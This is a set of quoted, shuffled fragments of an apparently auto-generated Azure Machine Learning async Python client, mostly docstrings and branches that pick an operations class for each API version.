subscription_id, **kwargs) self._client = AsyncARMPipelineClient(base_url=base_url,", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ComponentVersionsOperations as OperationClass else: raise ValueError(\"API", "Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License.", "2021-10-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspacesOperations>` * 2022-01-01-preview: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspacesOperations>` * 2022-05-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspacesOperations>` \"\"\" api_version = self._get_api_version('workspaces') if", "\"\"\"Instance depends on the API version: * 1.5.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DeleteOperations>` * v1.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.DeleteOperations>` \"\"\"", "latest API version available on public Azure. For production, you should stick to", "present. \"\"\" DEFAULT_API_VERSION = '2022-05-01' _PROFILE_TAG = \"azure.mgmt.machinelearningservices.AzureMachineLearningWorkspaces\" LATEST_PROFILE = ProfileDefinition({ _PROFILE_TAG: {", "ValueError(\"API version {} does not have operation group 'code_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "Deserializer(self._models_dict(api_version))) @property def virtual_machine_sizes(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.VirtualMachineSizesOperations>`", "API version: * 2021-10-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.VirtualMachineSizesOperations>` * 2022-01-01-preview: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.VirtualMachineSizesOperations>` * 2022-05-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.VirtualMachineSizesOperations>` \"\"\" api_version", "API version: * 2021-10-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceConnectionsOperations>` * 2022-01-01-preview: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceConnectionsOperations>` * 2022-05-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceConnectionsOperations>` \"\"\" api_version", "operation group 'dataset_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def datasets_v1(self): \"\"\"Instance depends", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def migration(self): \"\"\"Instance depends on the API version:", "depends on the API version: * 2021-10-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentContainersOperations>` * 2021-10-01-dataplanepreview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentContainersOperations>` * 2022-02-01-preview:", "self._get_api_version('batch_job_deployment') if api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobDeploymentOperations as OperationClass else: raise", "ModelContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ModelContainersOperations as OperationClass", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def code_versions(self): \"\"\"Instance depends on the API version: *", "Operations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "import PrivateEndpointConnectionsOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import PrivateEndpointConnectionsOperations as", "version: * 2021-10-01: :class:`DatasetContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetContainersOperations>` \"\"\" api_version = self._get_api_version('dataset_containers') if api_version == '2021-10-01': from", "have operation group 'quotas'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def registry_management_non_workspace(self): \"\"\"Instance", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'code_versions'\".format(api_version))", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import BatchEndpointsOperations as OperationClass else: raise ValueError(\"API version", "..v2022_02_01_preview.aio.operations import EnvironmentVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import EnvironmentVersionsOperations", "operation group 'migration'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def model_containers(self): \"\"\"Instance depends", "'assets': '1.0.0', 'async_operations': 'v1.0', 'batch_job_deployment': '2020-09-01-dataplanepreview', 'batch_job_endpoint': '2020-09-01-dataplanepreview', 'data_call': '1.5.0', 'data_container': '1.5.0', 'data_version':", "v1.0: :class:`RunsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunsOperations>` \"\"\" api_version = self._get_api_version('runs') if api_version == 'v1.0': from ..runhistory.aio.operations import", "on Azure Machine Learning Workspace resources. This ready contains multiple API versions, to", "\"\"\"Instance depends on the API version: * 1.0.0: :class:`ExtensiveModelOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ExtensiveModelOperations>` \"\"\" api_version = self._get_api_version('extensive_model')", "\"\"\" api_version = self._get_api_version('experiments') if api_version == 'v1.0': from ..runhistory.aio.operations import ExperimentsOperations as", "from ..v2022_02_01_preview.aio.operations import ComponentVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def delete(self): \"\"\"Instance depends on the API version: * 1.5.0:", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def component_versions(self): \"\"\"Instance depends on the API version:", "online_deployments(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineDeploymentsOperations>` * 2022-02-01-preview: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineDeploymentsOperations>`", "* 2022-01-01-preview: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceFeaturesOperations>` * 2022-05-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceFeaturesOperations>` \"\"\" api_version = self._get_api_version('workspace_features') if api_version ==", "subscription_id: str :param api_version: API version to use if no profile is provided,", "def dataset_controller_v2(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DatasetControllerV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetControllerV2Operations>` \"\"\" api_version", ":class:`RegistryManagementNonWorkspaceOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.RegistryManagementNonWorkspaceOperations>` \"\"\" api_version = self._get_api_version('registry_management_non_workspace') if api_version == 'v1.0': from ..registry_discovery.aio.operations import RegistryManagementNonWorkspaceOperations", "import OnlineEndpointsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "'2022-05-01': from ..v2022_05_01.aio.operations import EnvironmentContainersOperations as OperationClass else: raise ValueError(\"API version {} does", "== '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ModelContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from", "'v1.0', 'events': 'v1.0', 'experiments': 'v1.0', 'extensive_model': '1.0.0', 'get_operation_status': '1.5.0', 'metric': 'v1.0', 'migration': '1.0.0',", "= self._get_api_version('extensive_model') if api_version == '1.0.0': from ..model_dataplane.aio.operations import ExtensiveModelOperations as OperationClass else:", "api_version): return {k: v for k, v in cls.models(api_version).__dict__.items() if isinstance(v, type)} @classmethod", "MultiApiClientMixin.\" Will be removed in final version of multiapi azure-core based client \"\"\"", "= self._get_api_version('compute') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ComputeOperations as OperationClass elif", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'private_endpoint_connections'\".format(api_version)) return", ":class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.VirtualMachineSizesOperations>` \"\"\" api_version = self._get_api_version('virtual_machine_sizes') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import VirtualMachineSizesOperations", "'data_version': '1.5.0', 'dataset_containers': '2021-10-01', 'dataset_controller_v2': '1.5.0', 'dataset_v2': '1.5.0', 'dataset_versions': '2021-10-01', 'datasets_v1': '1.5.0', 'delete':", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import BatchDeploymentsOperations as OperationClass elif api_version ==", "'2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import CodeContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "..v2022_05_01.aio.operations import EnvironmentContainersOperations as OperationClass else: raise ValueError(\"API version {} does not have", "have operation group 'usages'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def virtual_machine_sizes(self): \"\"\"Instance", "to operate on Azure Machine Learning Workspace resources. This ready contains multiple API", "does not have operation group 'workspaces'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) async def", "'delete': 'v1.0', 'events': 'v1.0', 'experiments': 'v1.0', 'extensive_model': '1.0.0', 'get_operation_status': '1.5.0', 'metric': 'v1.0', 'migration':", "operation group 'assets'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def async_operations(self): \"\"\"Instance depends", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'code_containers'\".format(api_version)) return", "from ..v2021_10_01_dataplanepreview.aio.operations import TemporaryDataReferencesOperations as OperationClass else: raise ValueError(\"API version {} does not", "operation group 'workspace_features'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspaces(self): \"\"\"Instance depends", "* v1.0: :class:`RunsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunsOperations>` \"\"\" api_version = self._get_api_version('runs') if api_version == 'v1.0': from ..runhistory.aio.operations", "'1.5.0', 'delete': 'v1.0', 'events': 'v1.0', 'experiments': 'v1.0', 'extensive_model': '1.0.0', 'get_operation_status': '1.5.0', 'metric': 'v1.0',", "== '2021-10-01': from ..v2021_10_01.aio.operations import UsagesOperations as OperationClass elif api_version == '2022-01-01-preview': from", "have operation group 'code_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def code_versions(self): \"\"\"Instance", "from azure.profiles import KnownProfiles, ProfileDefinition from azure.profiles.multiapiclient import MultiApiClientMixin from msrest import Deserializer,", "return models raise ValueError(\"API version {} is not available\".format(api_version)) @property def assets(self): \"\"\"Instance", "from msrest import Deserializer, Serializer from ._configuration import AzureMachineLearningWorkspacesConfiguration if TYPE_CHECKING: # pylint:", "ComponentVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ComponentVersionsOperations as OperationClass", "'v1.0': from ..runhistory.aio.operations import MetricOperations as OperationClass else: raise ValueError(\"API version {} does", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def component_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "* 2022-02-01-preview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelVersionsOperations>` * 2022-05-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelVersionsOperations>` \"\"\" api_version = self._get_api_version('model_versions') if api_version ==", "def jobs(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.JobsOperations>` * 2022-02-01-preview:", "== '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import OnlineDeploymentsOperations as OperationClass elif api_version == '2022-05-01': from", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import VirtualMachineSizesOperations as OperationClass elif api_version == '2022-01-01-preview':", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def virtual_machine_sizes(self): \"\"\"Instance depends on the API", "* 2022-05-01: :class:`Operations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.Operations>` \"\"\" api_version = self._get_api_version('operations') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "not have operation group 'data_call'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_container(self):", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import QuotasOperations as OperationClass else: raise ValueError(\"API version", "version: * 2021-10-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.VirtualMachineSizesOperations>` * 2022-01-01-preview: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.VirtualMachineSizesOperations>` * 2022-05-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.VirtualMachineSizesOperations>` \"\"\" api_version =", "'2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspacesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "from ..v2021_10_01.aio.operations import OnlineEndpointsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_job_endpoint(self): \"\"\"Instance depends on the API version:", "* 2021-10-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchDeploymentsOperations>` * 2022-02-01-preview: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchDeploymentsOperations>` * 2022-05-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchDeploymentsOperations>` \"\"\" api_version = self._get_api_version('batch_deployments')", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import DataVersionsOperations as OperationClass else: raise", "credential: Credential needed for the client to connect to Azure. :type credential: ~azure.core.credentials_async.AsyncTokenCredential", "2021-10-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentContainersOperations>` * 2021-10-01-dataplanepreview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentContainersOperations>` * 2022-02-01-preview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentContainersOperations>` * 2022-05-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentContainersOperations>` \"\"\" api_version", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ModelContainersOperations as OperationClass else: raise ValueError(\"API version", "\"\"\"Instance depends on the API version: * 2021-10-01-dataplanepreview: :class:`TemporaryDataReferencesOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.TemporaryDataReferencesOperations>` \"\"\" api_version = self._get_api_version('temporary_data_references')", "azure.profiles.KnownProfiles :keyword int polling_interval: Default waiting time between two polls for LRO operations", "version {} does not have operation group 'batch_job_endpoint'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "API version: * 2021-10-01: :class:`DatasetVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetVersionsOperations>` \"\"\" api_version = self._get_api_version('dataset_versions') if api_version == '2021-10-01':", "_PROFILE_TAG + \" latest\" ) def __init__( self, credential: \"AsyncTokenCredential\", subscription_id: str, api_version:", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def usages(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "WorkspaceFeaturesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspaceFeaturesOperations as OperationClass", "dataset_controller_v2(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DatasetControllerV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetControllerV2Operations>` \"\"\" api_version =", "from ..v2021_10_01.aio.operations import DatasetContainersOperations as OperationClass else: raise ValueError(\"API version {} does not", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceFeaturesOperations>` * 2022-01-01-preview: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceFeaturesOperations>` *", "* 2022-01-01-preview: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.QuotasOperations>` * 2022-05-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.QuotasOperations>` \"\"\" api_version = self._get_api_version('quotas') if api_version ==", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'dataset_controller_v2'\".format(api_version))", "def models(cls, api_version=DEFAULT_API_VERSION): \"\"\"Module depends on the API version: * 1.5.0: :mod:`dataset_dataplane.models<azure.mgmt.machinelearningservices.dataset_dataplane.models>` *", ":class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelContainersOperations>` * 2021-10-01-dataplanepreview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelContainersOperations>` * 2022-02-01-preview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelContainersOperations>` * 2022-05-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelContainersOperations>` \"\"\" api_version =", "2022-02-01-preview: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchDeploymentsOperations>` * 2022-05-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchDeploymentsOperations>` \"\"\" api_version = self._get_api_version('batch_deployments') if api_version == '2021-10-01':", "api_version = self._get_api_version('datastores') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import DatastoresOperations as OperationClass", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def online_deployments(self): \"\"\"Instance depends on the API version: *", "api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DataVersionsOperations as OperationClass elif api_version == '2022-05-01':", "..v2021_10_01_dataplanepreview.aio.operations import ComponentContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ComponentContainersOperations", "\"\"\"Instance depends on the API version: * v1.0: :class:`ExperimentsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.ExperimentsOperations>` \"\"\" api_version = self._get_api_version('experiments')", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'dataset_versions'\".format(api_version)) return", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'workspace_connections'\".format(api_version))", "'2022-05-01': from ..v2022_05_01.aio.operations import WorkspacesOperations as OperationClass else: raise ValueError(\"API version {} does", "AsyncARMPipelineClient from azure.profiles import KnownProfiles, ProfileDefinition from azure.profiles.multiapiclient import MultiApiClientMixin from msrest import", "as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspaceFeaturesOperations as OperationClass elif", "from ..v2022_05_01.aio.operations import EnvironmentContainersOperations as OperationClass else: raise ValueError(\"API version {} does not", "self._get_api_version('spans') if api_version == 'v1.0': from ..runhistory.aio.operations import SpansOperations as OperationClass else: raise", "api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ComponentContainersOperations as OperationClass elif api_version == '2022-02-01-preview':", "profile. The profile sets a mapping between an operation group and its API", "\"\"\" api_version = self._get_api_version('usages') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import UsagesOperations as", "AzureMachineLearningWorkspaces(MultiApiClientMixin, _SDKClient): \"\"\"These APIs allow end users to operate on Azure Machine Learning", "deal with all of the Azure clouds (Azure Stack, Azure Government, Azure China,", "2021-10-01-dataplanepreview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeContainersOperations>` * 2022-02-01-preview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeContainersOperations>` * 2022-05-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeContainersOperations>` \"\"\" api_version = self._get_api_version('code_containers') if", "if api_version == '1.5.0': from ..dataset_dataplane import models return models elif api_version ==", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def online_deployments(self): \"\"\"Instance depends on the API", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def models(self): \"\"\"Instance depends on the API", "of multiapi azure-core based client \"\"\" pass class AzureMachineLearningWorkspaces(MultiApiClientMixin, _SDKClient): \"\"\"These APIs allow", "the API version: * 2021-10-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.QuotasOperations>` * 2022-01-01-preview: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.QuotasOperations>` * 2022-05-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.QuotasOperations>` \"\"\"", "'metric': 'v1.0', 'migration': '1.0.0', 'models': '1.0.0', 'registry_management_non_workspace': 'v1.0', 'run': 'v1.0', 'run_artifacts': 'v1.0', 'runs':", "* 2020-09-01-dataplanepreview: :class:`BatchJobDeploymentOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobDeploymentOperations>` \"\"\" api_version = self._get_api_version('batch_job_deployment') if api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations", "WorkspaceFeaturesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import WorkspaceFeaturesOperations as OperationClass", "raise ValueError(\"API version {} does not have operation group 'metric'\".format(api_version)) return OperationClass(self._client, self._config,", "..v2022_05_01.aio.operations import DatastoresOperations as OperationClass else: raise ValueError(\"API version {} does not have", "API version: * v1.0: :class:`RegistryManagementNonWorkspaceOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.RegistryManagementNonWorkspaceOperations>` \"\"\" api_version = self._get_api_version('registry_management_non_workspace') if api_version == 'v1.0':", "have operation group 'datasets_v1'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def datastores(self): \"\"\"Instance", "def quotas(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.QuotasOperations>` * 2022-01-01-preview:", "Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'data_container'\".format(api_version))", "if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import GetOperationStatusOperations as OperationClass else: raise ValueError(\"API", "API version: * 2021-10-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspacesOperations>` * 2022-01-01-preview: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspacesOperations>` * 2022-05-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspacesOperations>` \"\"\" api_version", ":class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.ComputeOperations>` * 2022-05-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComputeOperations>` \"\"\" api_version = self._get_api_version('compute') if api_version == '2021-10-01': from", "2021-10-01-dataplanepreview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelContainersOperations>` * 2022-02-01-preview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelContainersOperations>` * 2022-05-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelContainersOperations>` \"\"\" api_version = self._get_api_version('model_containers') if", "2022-05-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentVersionsOperations>` \"\"\" api_version = self._get_api_version('component_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "'1.5.0': from ..dataset_dataplane import models return models elif api_version == '1.0.0': from ..model_dataplane", "api_version: Optional[str] = None, base_url: str = \"https://management.azure.com\", profile: KnownProfiles = KnownProfiles.default, **kwargs", "'2021-10-01': from ..v2021_10_01.aio.operations import ComputeOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations", "operation group 'batch_deployments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_endpoints(self): \"\"\"Instance depends", "have operation group 'batch_job_deployment'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_job_endpoint(self): \"\"\"Instance", "2022-05-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.JobsOperations>` \"\"\" api_version = self._get_api_version('jobs') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "== '2021-10-01': from ..v2021_10_01.aio.operations import WorkspacesOperations as OperationClass elif api_version == '2022-01-01-preview': from", "2022-02-01-preview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentVersionsOperations>` * 2022-05-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentVersionsOperations>` \"\"\" api_version = self._get_api_version('component_versions') if api_version == '2021-10-01':", "elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ModelContainersOperations as OperationClass elif api_version ==", "depends on the API version: * 2021-10-01: :class:`DatasetVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetVersionsOperations>` \"\"\" api_version = self._get_api_version('dataset_versions') if", "API version: * 2021-10-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.QuotasOperations>` * 2022-01-01-preview: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.QuotasOperations>` * 2022-05-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.QuotasOperations>` \"\"\" api_version", "OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ComponentVersionsOperations as OperationClass elif api_version", "the code is # regenerated. # -------------------------------------------------------------------------- from typing import Any, Optional, TYPE_CHECKING", "have operation group 'delete'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def environment_containers(self): \"\"\"Instance", "not have operation group 'dataset_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def datasets_v1(self):", "BatchEndpointsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import BatchEndpointsOperations as OperationClass", "on the API version: * 1.0.0: :class:`AssetsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.AssetsOperations>` \"\"\" api_version = self._get_api_version('assets') if api_version", "api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ComponentVersionsOperations as OperationClass elif api_version == '2022-05-01':", "== '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspacesOperations as OperationClass elif api_version == '2022-05-01': from", "API version: * 2021-10-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchDeploymentsOperations>` * 2022-02-01-preview: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchDeploymentsOperations>` * 2022-05-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchDeploymentsOperations>` \"\"\" api_version", "version {} is not available\".format(api_version)) @property def assets(self): \"\"\"Instance depends on the API", "* 2022-02-01-preview: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchDeploymentsOperations>` * 2022-05-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchDeploymentsOperations>` \"\"\" api_version = self._get_api_version('batch_deployments') if api_version ==", "@property def 